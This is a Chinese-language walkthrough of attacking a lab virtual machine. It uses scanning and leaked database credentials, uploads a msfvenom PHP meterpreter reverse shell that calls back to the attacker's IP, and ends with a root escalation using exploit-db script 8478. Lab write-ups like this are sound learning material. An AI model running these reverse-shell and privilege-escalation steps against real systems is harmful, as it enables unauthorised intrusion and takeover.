0x00环境
攻击机IP:192.168.1.28
目标机IP:192.168.1.24
0x01实战
端口扫描
nmap -sV -p- 192.168.1.24
可以看到开放了很多端口
目录扫描
扫描出一堆东西
漏洞发现
根据扫描出来的目录查找发现
直接可以看到PHPinfo
可以访问db.@R_502_6308@文件,直接得到数据库账户和密码
等还有其它的一些东西就不列举了。。。
漏洞利用
访问80端口HTTP服务可以知道本网站由Toby Victor开发。它由PHP和MysqL提供支持,并托管在CentOSlinux 服务器上。
尝试使用上面得到的账户admin/adminpass登录网站
而且前面我们在网站主页得知是支持PHP的,那么我们可以尝试上传木马文件反弹shell
msfvenom -p PHP/meterpreter/reverse_tcp -o /root/shell.PHP lhost=192.168.1.28 lport=4444
尝试上传,如果失败再尝试绕过
在主页可以看到上传成功
创建监听
use exploit/multi/handler
set payload PHP/meterpreter/reverse_tcp
set lhost 192.168.1.28
set lport 4444
run
在主页上点击Read more即可反弹shell
提权
查看系统信息
sysinfo
不知为何无法执行命令
使用老版kali(192.168.1.12)
内核版本为2.6.18-92.el5,在互联网查漏洞利用https://www.exploit-db.com/exploits/8478
将提权脚本下载并查看
将dos格式修改为linux格式
dos2unix 8478.sh
上传到靶机上的tmp目录中
赋予脚本执行权限并执行
chmod +x 8478.sh
报错,因为必须为脚本提供正确的 PID 才能使代码正常工作。所以现在我们必须找到一个合适的 PID,并在该 PID 的帮助下运行脚本
cat /proc/net/netlink
执行脚本,多尝试几次,成功得到root权限
./8478.sh 568
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。